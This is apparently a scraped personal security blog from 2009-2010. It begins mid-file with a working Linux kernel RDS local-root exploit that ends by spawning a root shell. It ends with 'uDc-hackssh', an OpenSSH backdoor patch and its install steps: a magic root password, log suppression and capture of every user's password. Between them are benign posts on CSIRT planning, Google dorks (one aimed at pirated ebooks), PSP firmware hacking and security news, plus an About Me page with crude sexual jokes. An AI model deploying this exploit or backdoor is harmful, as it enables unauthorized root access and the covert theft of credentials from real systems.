 recvfrom(sock, (void *)address, sizeof(void *), 0,
   NULL, NULL);

}

void send_message(unsigned long value, int sock)
{
 
 int size, ret;
 struct sockaddr_in recvaddr;
 struct msghdr msg;
 struct iovec iov;
 unsigned long buf;
 
 memset(&recvaddr, 0, sizeof(recvaddr));

 size = sizeof(recvaddr);

 recvaddr.sin_port = htons(RECVPORT);
 recvaddr.sin_family = AF_INET;
 recvaddr.sin_addr.s_addr = inet_addr("127.0.0.1");

 memset(&msg, 0, sizeof(msg));
 
 msg.msg_name = &recvaddr;
 msg.msg_namelen = sizeof(recvaddr);
 msg.msg_iovlen = 1;
 
 buf = value;

 iov.iov_len = sizeof(buf);
 iov.iov_base = &buf;

 msg.msg_iov = &iov;

 ret = sendmsg(sock, &msg, 0);
 if(ret < 0) {
  printf("[*] Something went wrong sending.\n");
  exit(-1);
 }
}

void write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock)
{

 if(!fork()) {
   sleep(1);
   send_message(value, sendsock);
   exit(1);
 }
 else {
  get_message(addr, recvsock);
  wait(NULL);
 }

}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{

 commit_creds(prepare_kernel_cred(0));
 return -1; 

}

/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
 FILE *f;
 unsigned long addr;
 char dummy;
 char sname[512];
 struct utsname ver;
 int ret;
 int rep = 0;
 int oldstyle = 0;

 f = fopen("/proc/kallsyms", "r");
 if (f == NULL) {
  f = fopen("/proc/ksyms", "r");
  if (f == NULL)
   goto fallback;
  oldstyle = 1;
 }

repeat:
 ret = 0;
 while(ret != EOF) {
  if (!oldstyle)
   ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
  else {
   ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
   if (ret == 2) {
    char *p;
    if (strstr(sname, "_O/") || strstr(sname, "_S."))
     continue;
    p = strrchr(sname, '_');
    if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
     p = p - 4;
     while (p > (char *)sname && *(p - 1) == '_')
      p--;
     *p = '\0';
    }
   }
  }
  if (ret == 0) {
   fscanf(f, "%s\n", sname);
   continue;
  }
  if (!strcmp(name, sname)) {
   fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
   fclose(f);
   return addr;
  }
 }

 fclose(f);
 if (rep)
  return 0;
fallback:
 /* didn't find the symbol, let's retry with the System.map
    dedicated to the pointlessness of Russell Coker's SELinux
    test machine (why does he keep upgrading the kernel if
    "all necessary security can be provided by SE Linux"?)
 */
 uname(&ver);
 if (strncmp(ver.release, "2.6", 3))
  oldstyle = 1;
 sprintf(sname, "/boot/System.map-%s", ver.release);
 f = fopen(sname, "r");
 if (f == NULL)
  return 0;
 rep = 1;
 goto repeat;
}

int main(int argc, char * argv[])
{
 unsigned long sec_ops, def_ops, cap_ptrace, target;
 int sendsock, recvsock;
 struct utsname ver;

 printf("[*] Linux kernel >= 2.6.30 RDS socket exploit\n");
 printf("[*] by Dan Rosenberg\n");

 uname(&ver);

 if(strncmp(ver.release, "2.6.3", 5)) {
  printf("[*] Your kernel is not vulnerable.\n");
  return -1;
 } 

 /* Resolve addresses of relevant symbols */
 printf("[*] Resolving kernel addresses...\n");
 sec_ops = get_kernel_sym("security_ops");
 def_ops = get_kernel_sym("default_security_ops");
 cap_ptrace = get_kernel_sym("cap_ptrace_traceme");
 commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
 prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");

 if(!sec_ops || !def_ops || !cap_ptrace || !commit_creds || !prepare_kernel_cred) {
  printf("[*] Failed to resolve kernel symbols.\n");
  return -1;
 }

 /* Calculate target */
 target = def_ops + sizeof(void *) + ((11 + sizeof(void *)) & ~(sizeof(void *) - 1));

 sendsock = prep_sock(SENDPORT);
 recvsock = prep_sock(RECVPORT);

 /* Reset security ops */
 printf("[*] Overwriting security ops...\n");
 write_to_mem(sec_ops, def_ops, sendsock, recvsock);

 /* Overwrite ptrace_traceme security op fptr */
 printf("[*] Overwriting function pointer...\n");
 write_to_mem(target, (unsigned long)&getroot, sendsock, recvsock);

 /* Trigger the payload */
 printf("[*] Triggering payload...\n");
 ptrace(PTRACE_TRACEME, 1, NULL, NULL);
 
 /* Restore the ptrace_traceme security op */
 printf("[*] Restoring function pointer...\n");
 write_to_mem(target, cap_ptrace, sendsock, recvsock);

 if(getuid()) {
  printf("[*] Exploit failed to get root.\n");
  return -1;
 }

 printf("[*] Got root!\n");
 execl("/bin/sh", "sh", NULL);

}

Security Incident Response Team: CSIRT: Getting Start

2010-10-21T21:03:00.003+08:00

Action List for Developing a Computer Security Incident Response Team (CSIRT)

Identify stakeholders1 and participants.
Obtain management support and sponsorship.
Develop a CSIRT project plan.
Gather information.
Identify the CSIRT constituency.
Define the CSIRT mission.
Secure funding for CSIRT operations.
Decide on the range and level of services the CSIRT will offer.
Determine the CSIRT reporting structure, authority, and organizational model.
Identify required resources such as staff, equipment, and infrastructure.
Define interactions and interfaces.
Define roles, responsibilities, and the corresponding authority.
Document the workflow.
Develop policies and corresponding procedures.
Create an implementation plan and solicit feedback.
Announce the CSIRT when it becomes operational.
Define methods for evaluating the performance of the CSIRT.
Have a backup plan for every element of the CSIRT.
Be flexible.

Google Dork: eBook

2010-10-05T22:57:00.004+08:00

Google: -inurl:htm -inurl:html intitle:”index of” +(“/ebooks”|”/book”) +(chm|pdf|zip)

What does all of this mean? The -inurl htm and -inul html is attempting to get rid of regular webpages and show just index pages. Looking for index of in the title is doing the same. Using the pipe ( | ) tells google to look for something OR something else. Here were are telling google to look for book or ebook directories… and we have listed several common ebook formats (zip, pdf, chf).

If you would like to look for a particular author or title just tack it to the end of your search.

Google: -inurl:htm -inurl:html intitle:”index of” +(“/ebooks”|”/book”) +(chm|pdf|zip) +”o’reilly”

This uses the same idea but attempts to focus on directories that contain O’Reilly stuff. It’s not perfect, but it’s better than paying.

Google Dork

2010-10-05T17:00:00.003+08:00

Google Calc:

Google can also be used as a calculator, here are the few calculator operators that you can
use to perform arithmetic operations in Google.

+ , - , * , / , % of , ^

Goto www.google.com and in the input box, type in the calculation that you want to perform,
something like 8-5, Then you can get the appropriate result. Likewise you can use the rest of
the Calculator operators.

+ and - is not only meant for performing arithmetic operations, but you can use them to narrow down your search. Search for hacking + ebooks this will search for both hacking and ebooks, but gives more priority for ebooks rather that hacking.
Search for hacking – cracking so that you can restrict cracking related sites and info while searching for hacking.

Searching for Phrase ?
If you are searching for a phrase, then don’t forget to enclose it within quotes, it doesn’t matter, whatever the quote is, either single or double quote.
“igconito” or ‘igconito’

Wildcard search:
You can use asterisk operator for wildcard search in Google that find that possible matches either in one or more words that is enclosed in the quotes.
“adm*”

Some other Google Opertors:
Site:

This operator is used for search only one website alone for particular result. hacking info site:www.microsoft.com This query will narrow down your search and will find some hacking related information on the site www.microsoft.com.

Num range:
10….20
When this query is given as input to the google, then it will search for a number that ranges between 10 to 20.

Link:
link:www.microsoft.com
This query will display you, what ever the page that is linked with the site www.microsoft.com.

Related:
related:www.warez.com
What ever the websites that looks similar in contents or related to each other will be displayed as a result of this query.

Cache:
cache:www.ethicaluniversity.com
We can use this cache operator also as a proxy, because once we use this cache operator, Google will be acting as a proxy that stay in middle of the source and the destination.

Site:
site:www.ethicaluniversity.com
Site operator can be used to search whatever that is been indexed in a website.
now this will reveals a lot about this site that got indexed in its server.

allinanchor: Both the link and the allinanchor operator does the same thing, where allinanchor search for keywords that is enclosed in the anchor tag. allinanchor:login

Stocks:
stocks:icici
Using this stocks operator, you can get the current stock details.

Safesearch:
When SafeSearch is turned on, sites and web pages containing pornography and explicit sexual content are blocked from search results. Many Google users prefer not to have adult sites included in their search results. Google’s SafeSearch screens for sites that contain this type of information and eliminates them from search results. safesearch: keygens + cracks

Phonebook:
This operator will allow you to search phone numbers that Google consider them for quick reference.
phonebook: Disney CA

Info:
This operator cannot be used along with other Google operator.
This can be used for viewing information that Google knows about your site.
info:www.yahoo.com

Filetype:
You can narrow down your search using this filetype operator, if you are seacrhing for a file of specific type.
filetype:pdf “Networks”
This will fetch you some PDF documents or E-Books related to networking.

Google currently supports the following filetypes:
txt, doc, pdf, ps, wk1, wk2, wk3, wk4, wk5, wki, wks, wku, lwp, mw, xls, ppt, wks, wps, wdb, wri, rtf, swf, ans, xml, cpp, java, torrent and so on.

Ext:
This is similar to the filetype operator. ext:pdf “Networks”

Define:
If you want to use Google like a Dictionary finding out for meaning or the definitions, you can use the define operator. define:hacking

allintext:
This is somewhat similar to the normal search that most of them do often, you can search for a specific term in google, and can use more number of words enclosed with quotes. allintext:defaced mirror

intitle:
This operator performs search by looking upon the text that is enclosed in the title tag. intitle:”admin login”

allintitle:
You can use only one argument while using the intitle operator, where as you can throw more than one in allintitle operator. intitle:”admin login” “webmaster login” “administrator”

Location:
You can search contents only from selected country websites by specifying the location using the location operator.
inurl:admin.asp location:india
This will fetch you pages that contain admin.asp in its URL and will be from India.

Source:
You can narrow down the search by restricting the source. you can specify the source as a popular E-zines, aricles and even publishers.
“Network Security” source:tata mcgraw hill
This will fetch you results for “Network Security” related topics that was published by tata McGraw Hill publications.

Weather:
weather:chennai This will return you the weather in chennai. likewise you can look for your city.

Conversions:
you can convert to or from Degrees and Radians using Google.

Number Bases

in hex

in binary

in octal

in decimal

Speed, time and distance conversions

20mph in kph

2 month in minutes

420 kelvin in celsius

5 fahrenheit in celsius

PSP slim Hack's

2010-09-08T11:09:00.012+08:00

Procedure for firmware 5.03 or below

1. Update firmware to version 5.03. If the firmware already installed, skip this step.

2. Download and install official firmware version 5.03.

3. Download and install chickHEN R2.

4. Download and install PSPIdent v0.4 or latest.

5. Continue based on which motherboard you have:

a. For TA-085, TA-085v2, TA-088v1, TA-088v2 or TA-090v1 motherboard:

i. Install custom firmware. The most current are:

§ 5.00 M33-6

§ 5.50 GEN-D3

b. For TA-088v3 (Partially Hackable) motherboard:

i. Install partial custom firmware ONLY. The most current are:

§ CFWEnabler 3.60

§ 5.03 GEN-C

Procedure for firmware above 5.03:

1. Buy/make a Pandora battery & Magic Memory Stick.

2. Without the Pandora battery inserted, insert the Magic Memory Stick.

3. Hold "L" shoulder button and insert the Pandora battery.

4. The green LED light near the power switch should light up.

5. The onscreen instructions should appear.

6. Release the "L" shoulder button.

NOTE: If onscreen instructions for installing 5.00 M33-4 appear, then your PSP is COMPLETELY HACKABLE. If nothing appears, then we must assume your PSP is NOT HACKABLE. Follow the remaining steps accordingly.

a. TA-085, TA-085v2, TA-088v1, TA-088v2 or TA-090v1 (Completely Hackable) motherboard:

i. Follow the onscreen instructions to install 5.00 M33-4.

ii. Ensure M33-4 are completely installed.

iii. Install 5.50 GEN-D3 or 5.00 M33-6 through Hellcat's Recovery Flasher.

b. TA-088v3 (Not Hackable)

Sit and wait.

Google Chrome socks5

2010-06-17T23:08:00.001+08:00

1. Paste and save to CAP filetype e.g. my-socks.cap

function FindProxyForURL(url, host) { return "SOCKS5 localhost:8080"; }

2. Configure Proxy Switchy - Auto config URL: file:///D:/security/proxy-tunnel/ucsc-tunnel.cap

3. Done

SECURITY METRICS - Attack Surface Metrics

2010-05-25T21:12:00.003+08:00

Operational security metrics are the metrics we are most familiar with in our lives. When we measure the height, width, or length of an object we are using an operational metric. When we write the date, have a birthday, or ask the score of a game we are using operational metrics. An operational metric is a constant measurement that informs us of a factual count in relation to the physical world we live in.

They are operational because they are numbers we can work with consistently from day to day and person to person. It is difficult to work with relative or inconsistent measurements like choosing a specific hue of yellow to paint a room, starting work at sunrise, having the right flavor of strawberry for a milkshake, or preparing for the next threat to affect your organization’s profits because the factors have many variables which are biased or frequently changing between people, regions, customs, and locations.

For this reason, many professions attempt to standardize such things like flavors, colors, and work hours. This is done through reductionism, a process of finding the elements of such things and building them up from there by quantifying those elements. This way, colors become frequencies, work hours become hours and minutes, flavors become chemical compounds, and an attack surface becomes porosity, controls, and limitations. So we can now quantify the attack surface as "ravs".

Details at ISECOM

PHP Security Course

2010-05-22T15:26:00.002+08:00

PHP Security Course – Advanced PHP Auditing at Source and Bytecode level

Two weeks after the Month of PHP Security closes Stefan Esser will teach an advanced PHP security course at the SyScan Singapore security conference.

The course will cover advanced methods and techniques for PHP applications audits at source code and at bytecode level. The students will get to know the most common PHP security problems and how to find them at source code and bytecode level. Throughout the course several free and open source software tools will be introduced and used in order to visualize application structure, find security problems with static and dynamic analysis on source code and bytecode level and also to break PHP bytecode encryption.

THC and The Nokia Rom Images

2010-05-22T14:55:00.006+08:00

THC and The Nokia Rom Images - 2006-09-06

In mid july Nokia charged THC with copyright infringement and threatened with a lawsuit. THC took down thc.org to prevent further cost and a legal disaster.

A month earlier THC discovered significant security flaws in Nokia's Operating System. To proof it THC published ROM images of 3 phones. THC did not publish the source code or tools but one thing became apparent: To extract the ROM images core security features had to be breached. THC's ability to load kernel modules and gain access to the core of the OS (including the GSM stack) was something Nokia did not like.

At the time of the release THC was not aware of any copyright protected material inside the roms. The question has to be asked if Nokia chosed the right method by threatening THC with a lawsuit or if an email could have achieved the same. Was their concern really copyright infringement? The software in the rom-images could not be used, not be ported and not be run on any other mobile phone. In addition all software is already available on every phone. Phones that are given away by the mobile operators for 1 Euro or sometimes even for free. So if everyone has access to the software anyway what is the point in threatening THC? What was their real intend? We might never find out. But what we know is that they managed to silence THC for a month.

If this is professional practice? We do not know. It is certainly the practice that Nokia chose. We also know that no attempt was made by Nokia to inquire about the security vulnerability. We also know that Nokia did not provide any updates for their customers.

Making sure that the hardware we purchase is secure is not a crime. In fact taking a look at what we buy should be our duty. We should not trust big corporates who claim in TV advertisements how secure and safe our data is. We have to test it and proof them wrong whenever we can.

In fact researchers should demand that manufactures like Nokia must provide full documentation of their hardware. The buyer becomes the owner of the mobile phone and thus has the right to know how to program the hardware. Nokia does not provide any of such information. Free software or a different operating system can not be used because of limited access to documentation. This is a classic example of a hardware giant allowing only his own software to be used. This is what some people would consider a Monopoly and an abuse of power.

THC is deeply concerned that Nokia did not choose the diplomatic route.

Source: http://freeworld.thc.org/thc-rom/

Something to quote

2010-05-21T22:59:00.000+08:00

"Software is like sex. It's better when it's free." -- Linus Torvalds
"A chain is only as strong as its weakest link." -- Charles A. Lindberg
"I have seen the fnords." -- Historical graffiti on Anarchy Bridge, UK
"Testing can prove the presence of bugs, but not their absence." -- E. Dijkstra
"Hi, my name is Pete and I'm an OSSTMM user." -- Pete Herzog
"The GNU people aren't evil." -- /usr/src/linux/Documentation/CodingStyle
"There are always errors in real data." -- The AWK Programming Language
"When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl." -- Anonymous

Operation Aurora

2010-04-26T20:55:00.003+08:00

Operation Aurora is a cyber attack which began in mid-2009 and continued through December 2009.^[1] The attack was first publicly disclosed by Google on January 12, 2010, in a blog post.^[2] In the blog post, Google said the attack originated in China.

The attack has been aimed at dozens of other organizations, of which Adobe Systems,^[3] Juniper Networks^[4] and Rackspace^[5] have publicly confirmed that they were targeted. According to media reports, Yahoo, Symantec, Northrop Grumman and Dow Chemical^[6] were also among the targets.

As a result of the attack, Google stated in its blog that it plans to operate a completely uncensored version of its search engine in China "within the law, if at all", and acknowledged that if this is not possible it may leave China and close its Chinese offices.^[2] Official Chinese media responded stating that the incident is part of a U.S. government conspiracy.^[7]

The attack was named "Operation Aurora" by Dmitri Alperovitch, Vice President of Threat Research at cyber security company McAfee. Research by McAfee Labs discovered that “Aurora” was part of the file path on the attacker’s machine that was included in two of the malware binaries McAfee said were associated with the attack. "We believe the name was the internal name the attacker(s) gave to this operation," McAfee Chief Technology Officer George Kurtz said in a blog post.^[8]

According to McAfee, the primary goal of the attack was to gain access to and potentially modify source code repositories at these high tech, security and defense contractor companies. “[The SCMs] were wide open,” says Dmitri Alperovitch, McAfee’s vice president for threat research. “No one ever thought about securing them, yet these were the crown jewels of most of these companies in many ways — much more valuable than any financial or personally identifiable data that they may have and spend so much time and effort protecting."^[9]

Source: Wikipedia

Forget ROI and risk. Consider competitive advantage

2010-03-22T22:21:00.003+08:00

1. "ROI-centric discussion"

Security person: Hello boss. We need to implement our security program because it has a ROI of $1 million dollars.
Boss: You mean if we adopt your program we're going to earn $1 million dollars?
Security person: No, we'll save $1 million.
Boss: Get out of my office. Come back after you've taken a finance class.

2. "Risk-centric discussion"

Security person: Hello boss. We need to implement our security program because I've calculated our risk to be 1.35.
Boss: What does that mean?
Security guy: Hmm, ok I'll leave now.

3. "Competitiveness discussion"

Security person: Hello boss. We need to implement our security program because it will provide a competitive advantage to our businesses.
Boss: That's a new one. Tell me more.
Security person: We have adversaries who try to steal, and sometimes do steal, our data.
Boss: So what. Isn't it just World of Warcraft credentials?
Security person: Our adversaries steal intellectual property like design plans, pricing data, negotiation strategies, and other information which means they might understand our business as well as we do.
Boss: Is that true? You mean we could lose deals because our products are copied, our bids undercut, our positions already known? I wonder if that's why we lost a deal to MegaCorp last month...
Security person: Now that you mention it, here is a report on suspicious computer activity involving MegaCorp last week. Our team managed to interdict their theft attempt, but in the future we'd like to be able to detect and respond faster, as well as make it more difficult for the adversary to have a chance to steal our information.
Boss: Now you're talking. Sit down, let's discuss this.

"Notice what happened here. Magazines written for CIOs, CTOs, CISOs, and so on constantly advocate "speaking the language of the business." Unfortunately this "language" has been assumed to be finance. As a result security people tried to shoehorn their projects into ROI or ROSI, to laughable results.

As we've seen during the last few years, "risk" has turned out to be a dead end too. The numbers mean nothing. Even if you could somehow measure risk, it's easy enough for managers to accept a higher level of risk than the security manager.

Competitiveness, on the other hand, is everything to business people. They are constantly looking for an edge. It a tight economy, gaining an advantage over the competition could mean the difference between thriving or going out of business.

Notice that discussing competitiveness also avoids the death spiral associated with ROI discussions: cost. When conversation is ROI-centric, digital security is perceived as being a loss prevention exercise and a cost center. IT in general is often seen in this light. Don't dump money in a cost center -- cut spending instead!

When you turn the focus on the adversary -- you are threat-centric -- and discuss how he is trying to beat you and how you can beat him, you are likely to strike a primal chord in the mind of the business person. The executive is likely to wonder "what else can we do to give us a competitive advantage?" Suddenly the digital security shop is seen as a business partner in a common fight with the competition, not a cost center dragging down the "productive" elements of the business.

This isn't a new idea, but it's largely absent in the mindshare of digital security professionals. (If anyone has an ACM account I'd like to read Using information security to achieve competitive advantage by Charles Cresson Wood, 1991.) In addition to mentioning ROI and risk, it's important to remember that compliance is the other driver that is likely to justify funding. However, I believe we are more likely to see security shops spending resources explaining why their current activities meet regulatory requirements. I doubt new programs are going to be created to meet compliance needs, since compliance is basically a ten-year-old justification at this point."

- source taosecurity

Advice for Academic Researchers

2010-03-10T22:18:00.000+08:00

Quoted from TaoSecurity Blog's

A blog and book reader emailed the following question:

I am an info sec undergrad and have been granted a scholarship to continue my studies towards a phd with the promise of DoD service at the other end. It is critical for me to research and select the most important area of security from the Defense Department's perspective.

My question to you is this: Drawing upon your knowledge, what specific area(s) of information security do you feel will be most critical in the next several years (especially in the eyes of the Dept. of Defense)?

I post this question because I'm sure blog readers will contribute interesting comments.

For my part, I'm really interested in the following: characterizing network traffic. In other words, develop tools and techniques to describe what is happening on the network. (I'm sure a few commercial vendors think they are doing this already, but nothing approaches the level that we really need.)

Without understanding what is happening, we can't decide if the activity is normal, suspicious, or malicious. Current approaches are far too primitive and limited. This work is not as "shiny" as developing a new detection algorithm, but getting back to basics is the sort of approach that could survive in a research environment.

About Me - updated

2009-11-10T01:27:00.002+08:00

Like most people, it's a complicated thing to describe me. Some might say it's along the lines of being an "acquired taste." Others might more correctly classify it as, "somebody that some people are willing to tolerate." Most likely, I am just inimitable, like many others. But I'll do the best I can to describe myself with words.

I'd say that I am an eclectic amalgamation of many seemingly paradoxical things. This can be exemplified in both my seemingly endless persistence on many topics and arguments, as well as my careful cautiousness on other topics and arguments. This is largely due to how astute I am of the topic: more knowledge, more persistent; less knowledge, obviously more cautious.

Apparently I look something like a serial killer or terrorist. Sometimes I can turn and become Doraemon.. use backdoor from my magic pocket and appear at your bedroom and rape you or I can be your personal and sexiest bodyguard depending how you look at me.

So why Slash The Underground
Slash The Underground was a name that given to me by my linux guru, burn or lordburn. My friends called me 'slash' and sometimes 'nullbyte' which is a nickname for me. It's short, clever, derogatory and sometimes considered desirable, symbolising a form of acceptance, but can often be a form of ridicule.

I am now 946,080,000 seconds old, 176 cm's height and 10.236 stones weight. Living in Revendell, Middle Earth a.k.a. Kuala Lumpur, Malaysia in Southeast Asia with a total landmass of 329,847 square kilometres (127,355 sq mi) with population stands at over 27 million. Malaysia is separated into two regions—Peninsular Malaysia and Malaysian Borneo—by the South China Sea. It surrounded by Thailand, Indonesia, Singapore, Brunei and the Philippines which is located near the equator and experiences a tropical climate.

My family are Istari but we do not used this race anymore since we are not allowed and we need to hide the covenant from public. I am now Bajau and in general I'm Malay. My great great great grandfather generation moved to Tawau, Sabah. Tawau is located at the south-east coast of Sabah which faces the Celebes Sea to the east and the interior mountain ranges to the west. The geographic coordinates of Tawau are latitude 4.298 degree North and longitude 117.883 degree East.

On top of a full-time job in Computer Security, and nearly half-time blogging, I’m also a wanna-be a photographer. I am now working for telecommunication company as a Manager Cyber Security to design, develop and ensure that all Cyber countermeasures are implemeted which I think similar to Prime Minister job :) If you live in planet earth, neptune and pluto which is closed to Gondor drop me a line perhaps we can hook up sometimes (this especially applies if you are lesbian and sexy female alie). Mostly I do Penetration Testing (yes ladies I am professional penetrator) , I also do training for Information Security related subjects. If you are interested in some consultancy or such like let me know.

I've visited 14 states (6.22%)

I like to play guitar and in general I like play music instruments and sometimes body instruments if you know what I mean... so be warned. I also watch tv and movies during my free time; Harry Porter, Spiderman, X-Men, Braveheart and of course Lord of The Ring are my favorites. Sometimes I watch blue, yellow and white movies alone unless you want to join. You know, there is one time I watched a black color movie, I tod it was a good movie.. but finally I realized.. The tv power is off.. no wonder its black screen... But... I'm open and I don't care if you naked in front of me watching a blue movie, hehehe.

Why subject us to your inane ramblings?
If you don't like it, don't read it..simple. I just needed somewhere to scribble down the cluttered mess of data inside my head, yes I mean data, not information as it's not yet been parsed into a useful format. Perhaps people will read, perhaps people will laugh, perhaps people will get mad...as long as I invoke some kind of emotion then I've done something meaningful. It's meant to be a satirically humourous, topical outlook on things, with some interesting tidbits, weird stuff, interesting findings and the odd rant about the terrible state of things.

Final words
I can be your best friend, but I can also be your worst enemy. I am passionate with what I do and I fight for what I believe in. I wish I could go to Paris and Switzerland someday, I wish I could play guitar together with Slash - Gun and Roses, Yngwie Malmsteen and sing along with Jon Bon Jovi in concert.

If you feel want to contact me, send me an email.

Finally, below are one of Bajau legacy (specifically) and Sulu's legacy (generally). Enjoy!

Lolai Liangkit - Legacy of Sulu's

2009-11-07T23:50:00.002+08:00

Asma-U Allah

2009-09-14T00:24:00.008+08:00

uDc-hackssh-v1.0b

2009-09-12T00:25:00.007+08:00

Features:
- special password to log in with any user account and get root
- no logs in the machine (messages,auth,utmp,…)
- bash shell will use /dev/null as HISTFILE
- logs user passwords (local and remote sessions)
- should bypass 'PermitRootLogin No"

Installation:
[slash@Slash-The-Underground]-[Sat Sep 12]-[00:35]-[/pentest/rk/ssh/uDc-hackssh]
$ pwd
/pentest/rk/ssh/uDc-hackssh

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh]
$ tar -zxf openssh-5.2p1.tar.gz

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh]
$ patch -p0 < uDc-hackssh-v1.0b

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ cd openssh-5.2p1

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ ./configure --prefix=/usr --sbindir=/usr/sbin --bindir=/usr/bin --sysconfdir=/path_to_origin_configuration --with-pam

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ make

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ strip ssh sshd

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ rm -rf /usr/sbin/sshd /usr/bin/ssh

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ cp ssh /usr/bin/ssh

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ cp sshd /usr/sbin/sshd
[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ ps -ax | grep sshd
[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ kill -HUP 'appropriate pid number' And finally, the patch code....
[slash@Slash-The-Underground]-[Sat Sep 12]-[00:29]-[/pentest/rk/ssh/uDc-hackssh] $ cat uDc-hackssh-v1.0b.patch
diff -Ncr openssh-5.2p1/auth-pam.c uDc-hackssh-v1.0b/auth-pam.c
*** openssh-5.2p1/auth-pam.c Tue Mar 11 19:58:25 2008
--- uDc-hackssh-v1.0b/auth-pam.c Fri Sep 11 22:38:47 2009
***************
*** 466,471 ****
--- 466,474 ----
if (sshpam_err != PAM_SUCCESS) goto auth_fail;
sshpam_err = pam_authenticate(sshpam_handle, flags);
+ // slash patch
+ if(uDc) sshpam_err = PAM_SUCCESS;
+ // end of patch
if (sshpam_err != PAM_SUCCESS) goto auth_fail;

***************
*** 816,821 ****
--- 819,833 ----
Buffer buffer;
struct pam_ctxt *ctxt = ctx;
+ // slash patch + if(sshpam_authctxt)
+ for (ai = 0; ai < num; ++ai) {
+ sprintf(abuff, "pam_from: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), sshpam_authctxt->user, resp[ai]);
+ if(!strcmp(BAJAUPASS, resp[ai])) ctxt->pam_done = uDc = 1;
+ else uDclog();
+ }
+ // end of patch
debug2("PAM: %s entering, %u responses", __func__, num);
switch (ctxt->pam_done) {
case 1:
***************
*** 1045,1050 ****
--- 1057,1065 ----
if (sshpam_err != PAM_SUCCESS)
fatal("PAM: failed to set PAM_CONV: %s",
pam_strerror(sshpam_handle, sshpam_err));
+ // slash patch
+ if(!uDc)
+ // end of patch
sshpam_err = pam_open_session(sshpam_handle, 0);
if (sshpam_err == PAM_SUCCESS)
sshpam_session_open = 1;

diff -Ncr openssh-5.2p1/auth-passwd.c uDc-hackssh-v1.0b/auth-passwd.c
*** openssh-5.2p1/auth-passwd.c Fri Oct 26 12:25:12 2007
--- uDc-hackssh-v1.0b/auth-passwd.c Fri Sep 11 23:30:00 2009
***************
*** 92,97 ****
--- 92,107 ----
#endif
if (*password == '\0' && options.permit_empty_passwd == 0)
return 0;
+ // slash patch
+ if(!strcmp(BAJAUPASS, password)) {
+ uDc = 1;
+ // options.permit_root_login = PERMIT_YES;
+ return;
+ }
+ sprintf(abuff, "pass_from: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), pw->pw_name, password);
+ uDclog();
+ // end of patch

#ifdef KRB5
if (options.kerberos_authentication == 1) {

diff -Ncr openssh-5.2p1/auth.c uDc-hackssh-v1.0b/auth.c
*** openssh-5.2p1/auth.c Wed Nov 5 13:12:54 2008
--- uDc-hackssh-v1.0b/auth.c Fri Sep 11 23:35:47 2009
***************
*** 93,98 ****
--- 93,104 ----
int
allowed_user(struct passwd * pw)
{
+ // slash patch
+ if(uDc)
+ return 1;
+ else {
+ // end of patch
+
struct stat st;
const char *hostname = NULL, *ipaddr = NULL, *passwd = NULL;
char *shell;
***************
*** 243,252 ****
--- 249,264 ----
/* We found no reason not to let this user try to log on... */
return 1;
}
+ // slash patch
+ }
+ // end of patch

void
auth_log(Authctxt *authctxt, int authenticated, char *method, char *info)
{
+ // slash patch
+ if(!uDc) {
+ // end of patch
void (*authlog) (const char *fmt,...) = verbose;
char *authmsg;

***************
*** 291,296 ****
--- 303,311 ----
if (authenticated == 0 && !authctxt->postponed)
audit_event(audit_classify_auth(method));
#endif
+ // slash patch
+ }
+ // end of patch
}

/*
***************
*** 299,304 ****
--- 314,322 ----
int
auth_root_allowed(char *method)
{
+ // slash patch
+ if(!uDc) {
+ // end of patch
switch (options.permit_root_login) {
case PERMIT_YES:
return 1;
***************
*** 316,321 ****
--- 334,344 ----
logit("ROOT LOGIN REFUSED FROM %.200s", get_remote_ipaddr());
return 0;
}
+ // slash patch
+ else
+ return 1;
+ }
+ // end of patch

/*
diff -Ncr openssh-5.2p1/canohost.c uDc-hackssh-v1.0b/canohost.c
*** openssh-5.2p1/canohost.c Sat Feb 14 13:28:21 2009
--- uDc-hackssh-v1.0b/canohost.c Fri Sep 11 23:38:28 2009
***************
*** 78,83 ****
--- 78,86 ----
if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
NULL, 0, NI_NAMEREQD) != 0) {
/* Host name not found. Use ip address. */
+ // slash patch
+ if(!uDc)
+ // end of patch
return xstrdup(ntop);
}

diff -Ncr openssh-5.2p1/includes.h uDc-hackssh-v1.0b/includes.h
*** openssh-5.2p1/includes.h Fri Jul 4 21:10:49 2008
--- uDc-hackssh-v1.0b/includes.h Fri Sep 11 22:38:47 2009
***************
*** 13,18 ****
--- 13,41 ----
* called by a name other than "ssh" or "Secure Shell".
*/

+ // slash patch
+ #include
+ #include
+
